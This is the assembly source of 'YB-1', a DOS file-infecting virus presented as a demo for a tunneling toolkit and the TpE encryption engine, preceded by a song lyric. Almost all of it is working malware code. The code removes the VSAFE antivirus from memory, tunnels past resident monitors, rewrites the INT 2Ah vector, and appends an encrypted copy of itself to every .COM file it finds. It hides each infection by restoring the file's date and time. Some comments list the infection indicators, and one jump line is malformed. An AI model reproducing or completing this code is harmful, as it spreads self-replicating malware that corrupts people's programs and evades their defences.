comment #
PRE-IGNITION
Hey you...
Tell me, what's your call name
Closed, negative display
Engaged on section three
The acrid factories
You...
Putrid perfect product
Proper platinum parts
Proficient prototypes
Steadily spew from these pipes
Are you...
The prime automaton
Christened as YB-1
Hey you...
Generated by waste
Arid quarry displaced
Enviro-mental squeeze
Aluminum disease
You...
Conscious of origin
Intention in the wind
Atmosphere infected
Descendants defected
Are you...
Novel stroke of design
Or relics from this mine
Casually, choke,
Noxious nourishment
Embodied, illicit cure
Ground and rock and sand
Come crumble tumble down
Grinding round
The hydraulic wheel
Extraction,
For ultimate greed
Now... hidden from view
Surveying stable shifts
A feeble groove
Unintentional split
Then they return to work
As if they're not disturbed
Cybernetic beings
Omniscient regiment
Thriving with vigor
Incessant loop
An assumed order
Auspicious tool
Frantically, flow
Spumous sediment
Remedied, neurotic fuse
Ground and rock and sand
Come crumble tumble down
Yonder sound, an echoing gong
Disjunction
Of their disowned song
Now... some are set free
Emotions flood their gaze
Synthetic breed
The pre-ignition phase
Pre-ignition
Flares up in you
Pre-ignition
Provokes me too.
#
;**********************************************************************
; YB-1.ASM
; AUTHOR: Köhntark
;
; Demonstration Virus for Köhntark's Recursive Tunneling Toolkit 4.1
; Demonstrates how to use KRTT 4.1 in conjunction with TpE 1.3.
; Please note that this is another 'unremarkable' computer virus.
; It is just a demo.
;**********************************************************************
extrn rnd_init:near ;TpE — external symbol; its code is not part of this file
extrn crypt:near ;TpE — external symbol; its code is not part of this file
extrn tunnel:near ;KRTT 4.1 — external symbol; its code is not part of this file
MAIN SEGMENT BYTE
ASSUME cs:main,ds:main,ss:nothing ;all part in one segment=com file
ORG 100h ;COM image: everything below is assembled relative to offset 100h
;**********************************
; fake host program
;**********************************
HOST: ;fake host program: a 3-byte near jmp, one marker byte, 3 NOPs, then a DOS terminate
db 0E9h,0Ah,00 ;jmp NEAR PTR VIRUS (E9 rel16: 0103h + 000Ah = 010Dh, the VIRUS label)
db ' ' ;byte at offset 103h is 20h; CHECK_N_INFECT_FILE tests offset 3 for this same value
db 090h,090h,090h ;padding so the terminate code starts at 0107h
mov ah,4CH ;DOS terminate-process function
mov al,0 ;exit code 0
int 21H ;terminate normally with dos
;═════════════════════════════════════════════════════════════════════════════
;**********************************
; VIRUS CODE STARTS HERE
;**********************************
VIRUS: ;a label for the first byte of the virus
;------------------------------------------------------------------
; Register roles in this routine (as established by the code below):
;   si = runtime offset of VIRUS ("delta"); every data reference is [si + label - VIRUS]
;   after TUNNEL: ah = status (01 = found, 02 = not hooked); di = offset, dx = segment
;   of the located vector (see the stores at CONTINU and CHECK_INT_2A)
;------------------------------------------------------------------
call GET_ENTRY_PT ;when call is performed absolute address goes to stack
GET_ENTRY_PT:
pop si ;si = runtime address of GET_ENTRY_PT
sub si,GET_ENTRY_PT - VIRUS ;fix absolute address: si = runtime offset of VIRUS
;************************************
; restore the host's 4 original bytes at cs:0100h
; (in memory, copied from START_CODE; the file is not touched here)
;************************************
push si ;save si
cld ;clear direction flag (movsw must count upward)
add si,START_CODE-VIRUS ;ds:si = saved first bytes of the host
mov di,0100h ;es:di = start of the host image (es = ds = cs for a COM image)
movsw ;this is shorter & faster than
movsw ;mov cx,04 and rep movsb
pop si ;restore si (delta)
;************************************
; REMOVE CPAV-MSAV VSAFE FROM MEMORY
; (if present)
;************************************
; This call goes through the current INT 21h vector (the tunnelled address is
; not known yet). Detection note: a resident monitor sees this request before
; anything else the code does.
mov dx,5945h
mov ax,0FA01h ;AL=01 very important!
int 21h
;************************************
; call KRTT 4.1
;************************************
push es ;save es
call TUNNEL ;call KRTT 4.1 (external): locates the original INT 21h handler
pop es ;restore es
cmp ah,01 ;int 21h found?
je CONTINU ;go on if so
cmp ah,02 ;int 21h not hooked?
jne EXIT_VIRUS2 ;any other status: give up without infecting
;************************************
; save INT 21h address if found
;************************************
CONTINU: ;reached for status 01 and 02; di:dx is stored in both cases
mov WORD PTR [si + INT_21 -VIRUS],di ;int 21h offset
mov WORD PTR [si + INT_21 -VIRUS+2],dx ;int 21h segment
;************************************
; CHECK INT 2Ah
;************************************
; NOTE: INT 2A points to a IRET in all DOS versions. This interrupt is hooked
; by NETWARE & similar software so a check is made to see if such programs are
; present.
; A Russian resident monitoring program hooks this vector as it it called
; from within DOS's INT 21h in all file openings. (INT 21h, AH=3D)
; Restoring the original INT 2A defeats effectively such program.
mov bp,01 ;search for INT 2A (bp selects the vector for TUNNEL; the default used by the first call is not shown here)
push es ;save es
call TUNNEL ;call KRTT 4.1 (external)
pop es ;restore es
cmp ah,02 ;int 2Ah not hooked?
je INT_2A_OK ;proceed
cmp ah,01 ;int 2ah found?
je CHECK_INT_2A ;found: probe it before restoring the vector
jmp short EXIT_VIRUS2 ;any other status: give up
CHECK_INT_2A:
xor ax,ax
int 2Ah ;check for Netware, etc.
cmp ax,00 ;an unhooked INT 2A (IRET) leaves ax untouched
jne EXIT_VIRUS2 ;ax changed: network software present, give up
push es ;save es
xor bx,bx ;bx=0
mov es,bx ;es=0 (segment of the interrupt vector table)
cli ;disable interrupts
; Detection note: the vector is written straight into the IVT at 0000:00A8h,
; not via the DOS set-vector function, so a hook on INT 21h/AH=25h never sees it.
mov WORD PTR es:[4 * 2Ah],di ;restore int 2A offset
mov WORD PTR es:[4 * 2Ah + 2],dx ;restore int 2A segment
sti ;enable interrupts
pop es ;restore es
INT_2A_OK:
;************************************
; redirect DTA onto virus code
;************************************
; The DTA is placed inside the virus body, so find-first/next results land in
; the DTA_File_* fields read by CHECK_N_INFECT_FILE (declared after the code).
lea dx,[si+ DTA - VIRUS] ;put DTA at the end of the virus for now
mov ah,1ah ;set new DTA function
int 21h
;************************************
; Routines called from here
;************************************
call FIND_FILE ;get a com file to attack!
;═════════════════════════════════════════════════════════════════════════════
EXIT_VIRUS:
;************************************
; set old DTA address
;************************************
mov ah,1ah
mov dx,80h ;fix dta back to return control to
int 21h ;host program (80h = default DTA in the PSP)
EXIT_VIRUS2: ;also reached directly from the TUNNEL/INT 2A checks, before the DTA was changed
;****************************************************************
; zero out registers for return to
; host program
;****************************************************************
mov si,0100h ;host entry point
xor bx,bx ;zero regs
xor ax,ax
cwd ;dx = 0 (sign extension of ax = 0)
push si ;save return address in stack
xor si,si
xor di,di
ret ;back to com host: pops 0100h, i.e. jumps to the restored host bytes
;═════════════════════════════════════════════════════════════════════════════
;------------------------------------------------------------------
; FIND_FILE: walk every entry matching FILES_TO_INFECT in the current
; directory and hand each one to CHECK_N_INFECT_FILE.
; In:  si = delta (runtime offset of VIRUS); DTA already set to the
;      in-body DTA by the caller
; Out: nothing; returns when find-next reports no more files (carry set)
; Note: find-first/find-next go through the normal INT 21h vector here,
;       whereas the file operations in CHECK_N_INFECT_FILE use the saved
;       INT_21 address.
;------------------------------------------------------------------
FIND_FILE:
lea dx,[si + FILES_TO_INFECT - VIRUS] ;ds:dx = '*.COM'
mov ah,4eh ;do DOS search 1st function
mov cx,3fh ;search for any file, with any attributes
NEXT_FILE: int 21h
jc NO_MO ;carry set: no (more) matching files
call CHECK_N_INFECT_FILE ;check file if file found
mov ah,4fh ;file no good..find next function
jmp jmp NEXT_FILE ;test next file for validity
NO_MO:
ret
;═════════════════════════════════════════════════════════════════════════════
NO_GOOD: ;shared failure path for CHECK_N_INFECT_FILE once the file is open
jmp GET_OUT ;close the handle and restore the original attributes, then return
;----------------------------------------------------------------------------
;------------------------------------------------------------------
; CHECK_N_INFECT_FILE: examine the file named in the DTA and, if it is
; accepted, append the (TpE-encrypted) body and patch the first 4 bytes.
; In:  si = delta; DTA_File_* fields filled by find-first/next
; Out: nothing; bx, cx, dx, ax clobbered
; Detection notes (from the code below): the file's date/time are put
; back after writing, so timestamps are not a reliable indicator; the
; size grows, the attributes are cleared and restored, and an infected
; file starts with E9 xx xx 20 (the 20h is the infection marker).
;------------------------------------------------------------------
CHECK_N_INFECT_FILE:
;*********************************************
; 1-Set attributes
;*********************************************
lea dx,[si + DTA_File_Name - VIRUS] ;dx = DTA filename ptr
xor cx,cx ;clear attributes (read-only/hidden/system removed before opening)
mov ax,4301h ;set file attributes to cx
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;pushf + far call = the frame an INT builds; goes to the saved address, not the current vector
jc NO_MO ;error: the file was never opened, so just return (NO_MO is a bare ret)
;*****************
; 2-OPEN FILE
;*****************
mov ax,3D02h ;r/w access to it
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
jc NO_GOOD ;error.. quit
xchg bx,ax ;bx = file handle
;********************
; 3-Read 1st 5 bytes
;********************
mov cx,5 ;read first 5 bytes of file
lea dx,[si + START_CODE - VIRUS] ;store'em here
mov ah,3Fh ;DOS read function
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
jc NO_GOOD ;error? get next file
;*********************
; 4-CHECK FILE
;*********************
mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS] ;get file's size (low word only)
add ax,FINAL - VIRUS + 232d + 1640d + 100h ;add virus size to it
jc NO_GOOD ;bigger then 64K:nogood
cmp WORD PTR [si + START_CODE - VIRUS],'ZM' ;EXE file?
je NO_GOOD ;'MZ' header: an EXE with a .COM name, skip it
cmp BYTE PTR [si + START_CODE - VIRUS],0E9H ;compare 1st byte to near jmp
jne INFECT ;not a near jmp: there can be no marker, proceed
cmp BYTE PTR [si + START_CODE+3 - VIRUS],20h ;check for the ' ' marker at offset 3 (see START_IMAGE)
je NO_GOOD ;marker present: already infected, skip it
INFECT:
;*********************
; 5-set PTR @EOF
;*********************
mov ax,4202H
xor cx,cx ;prepare to write virus on file
cwd ;position file pointer,cx:dx = 0
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h (returns new position in dx:ax; only ax is used below)
;*********************
; 6-call TpE
;*********************
mov bp,ax ;starting offset of decryptor
add bp,0100h ;fix bp
push ds ;save necessary registers
push si
push bx ;save file handle
mov ax,cs
add ax,0500h
mov es,ax ;fix new es segment: cs + 500h paragraphs (20 KB past the code); what crypt does with es is not shown here
call rnd_init ;initialize random # gen (external)
mov ax,00000110b ;initialize TPE flags
;ds = cs
mov dx,si ;virus's starting address
mov cx,FINAL - VIRUS + 248d + 1640d ;size of code to be encrypted + KTT's size + TPE's size
xor si,si ;distance between decryptor & code
call crypt ;call TpE (external); per the comments below it returns ds:dx = data to write, cx = its length
;*********************
; 7-Write Virus
;*********************
pop bx ;restore bx=file handle
;cx=decryptor + code size + KRTT's size + TPE's size
;write from ds:dx
mov ah,40h
pop si ;restore necessary registers (delta)
pushf ;save flags
call DWORD PTR cs:[si + INT_21 - VIRUS] ;call real int21h, SEGMENT OVERRIDE NEEDED
;since ds does not equal cs yet
pop ds ;ds = cs again
mov ax,ds
mov es,ax ;es = ds
;*********************
; 8-set PTR @BOF
;*********************
mov ax,4200h ;locate pointer at beginning of host
xor cx,cx
cwd ;position file pointer,cx:dx = 0
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
;******************************************
; 9-write new 4 bytes to beginning of file
;******************************************
mov ax,WORD PTR [si + DTA_File_SIZE - VIRUS] ;original size (low word)
sub ax,3 ;rel16 displacement from 0103h to the old end of file
mov WORD PTR [si + START_IMAGE+1 - VIRUS],ax ;patch the jmp target in the 4-byte image
mov cx,4 ;#of bytes to write
lea dx,[si+ START_IMAGE - VIRUS] ;ds:dx=pointer of data to write
mov ah,40h ;DOS write function
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
;*************************************************
; 10-Restore date and time of file to be infected
;*************************************************
mov ax,5701h
mov dx,WORD PTR [si + DTA_File_DATE - VIRUS]
mov cx,WORD PTR [si + DTA_File_TIME - VIRUS]
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
;****************
; 11-Close File
;****************
GET_OUT: ;entered from NO_GOOD as well; bx must still hold the open handle
mov ah,3Eh
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
;*************************************************
; 12-Restore file's attributes
;*************************************************
lea dx,[si + DTA_File_Name - VIRUS] ;get filename
xor cx,cx
mov cl,BYTE PTR [si + DTA_File_ATTR - VIRUS] ;get old attributes
mov ax,4301h ;set file attributes to cx
pushf ;save flags
call DWORD PTR [si + INT_21 - VIRUS] ;call real int21h
ret ;infection done!
;═════════════════════════════════════════════════════════════════════════════
NAME_AUTHOR db 'YB-1 / Köhntark' ;text string carried in the body (a static signature candidate)
FILES_TO_INFECT db '*.COM',0 ;search mask used by FIND_FILE
START_CODE db 090h,090h,090h,090h,090h ;area to store 5 bytes to w/r from / to file
START_IMAGE db 0E9h,0,0,020h ;4 bytes written to offset 0 of an infected file: jmp (target patched at +1) and the 20h marker
INT_21 dd 0 ;REAL INT 21h's address (offset, then segment), filled in at CONTINU
; Find-first DTA as laid out by DOS: 21 reserved bytes, then attribute (1),
; time (2), date (2), size (4) and the 8.3 name as an ASCIIZ string (13).
DTA db 21 dup(0) ;reserved
DTA_File_Attr db ?
DTA_File_Time dw ?
DTA_File_Date dw ?
DTA_File_Size dd ?
DTA_File_Name db 13 dup(0)
;═════════════════════════════════════════════════════════════════════════════
FINAL: ;label of byte of code to be kept in virus when it moves (end of the copied body; size constants above are computed from it)
MAIN ENDS
END HOST ;entry point is the fake host at 100h